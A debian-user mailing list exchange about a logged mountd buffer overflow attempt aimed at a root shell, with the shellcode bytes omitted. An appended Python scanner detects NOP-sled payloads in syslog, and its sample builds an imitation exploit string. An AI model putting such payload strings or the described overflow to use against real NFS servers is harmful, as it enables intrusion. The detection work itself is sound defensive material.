Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user.  Thanks!]
> 
> I got the following logged in my /var/log/syslog today.  It looks to me
> like a buffer overflow attack of some kind (character  is `no
> operation' in x86 assembly language).  Does anyone know of a
> vulnerability in mountd to this sort of thing?

Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months.

Current versions of debian are not vulnerable. It's a buffer overrun exploit
leading to root shell, I think.
 
> Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of 
> [non-printable shellcode bytes omitted; the readable string "Privet ADMcrew" appears inside them]
> Jan 31 18:26:41 pfaffben 
> attempted from 129.247.106.135 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access 
> [same non-printable shellcode bytes omitted]
> Jan 31 18:26:41 pfaffben 
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to 
> mount 
> [same non-printable shellcode bytes omitted]

It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing their ISP about this in case this is the cracker's actual home
machine.

-- 
see shy jo
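An added example, not from either poster, of the kind of check a defender might run over syslog to pick out mountd entries like the ones above and the address to report. It flags mountd messages whose mount argument contains a run of 0x90 (NOP) bytes or is dominated by non-printable characters, and pulls out the IPv4 address mountd logged for the request. The sample lines are constructed in the shape of the quoted ones (assuming the plain "timestamp host mountd[pid]:" prefix); the exploit bytes are stood in for by a NOP run plus a few arbitrary bytes.

```python
import re

# Constructed sample lines in the shape of the mountd syslog entries quoted in the
# thread. PAYLOAD stands in for the exploit string: a NOP sled (0x90 bytes), a few
# arbitrary non-printable bytes, the "Privet ADMcrew" marker and a repeated 4-byte
# pattern; the real one ran to several hundred bytes.
PAYLOAD = "\x90" * 40 + "\x1b\xcd\xd2\x8b\xda" + "Privet ADMcrew" + "(-\x05\x08" * 8
SAMPLE_LOG = (
    "Jan 31 18:26:41 pfaffben mountd[355]: NFS mount of " + PAYLOAD
    + " attempted from 129.247.106.135\n"
    "Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together\n"
    "Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to mount "
    + PAYLOAD + "\n"
    "Jan 31 18:30:02 pfaffben mountd[355]: NFS mount of /home by 192.0.2.10 succeeded\n"
)

MOUNTD_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) mountd\[\d+\]: (.*)$")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

def longest_nop_run(msg):
    """Length of the longest run of 0x90 (x86 NOP) bytes in the message."""
    return max((len(run) for run in re.findall("\x90+", msg)), default=0)

def nonprintable_ratio(msg):
    """Fraction of characters outside printable ASCII; an export path should be ~0."""
    return sum(1 for c in msg if not 32 <= ord(c) < 127) / len(msg) if msg else 0.0

def scan_syslog(text, min_nop_run=16, max_nonprintable_ratio=0.2):
    """One alert per mountd line whose request looks like binary shellcode rather
    than an export path, carrying the peer address mountd logged for it."""
    alerts = []
    for line in text.splitlines():
        m = MOUNTD_RE.match(line)
        if not m:
            continue  # only mountd's own messages are examined
        stamp, host, msg = m.groups()
        nop_run, ratio = longest_nop_run(msg), nonprintable_ratio(msg)
        if nop_run >= min_nop_run or ratio > max_nonprintable_ratio:
            ip = IPV4_RE.search(msg)
            alerts.append({"time": stamp, "host": host, "src": ip.group(1) if ip else None,
                           "nop_run": nop_run, "nonprintable_ratio": round(ratio, 2)})
    return alerts

if __name__ == "__main__":
    for alert in scan_syslog(SAMPLE_LOG):
        print(alert)
```

The benign mount of /home is not reported, while both payload-carrying lines are, each with the 129.247.106.135 address that the thread says should go to the box's admins and ISP.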
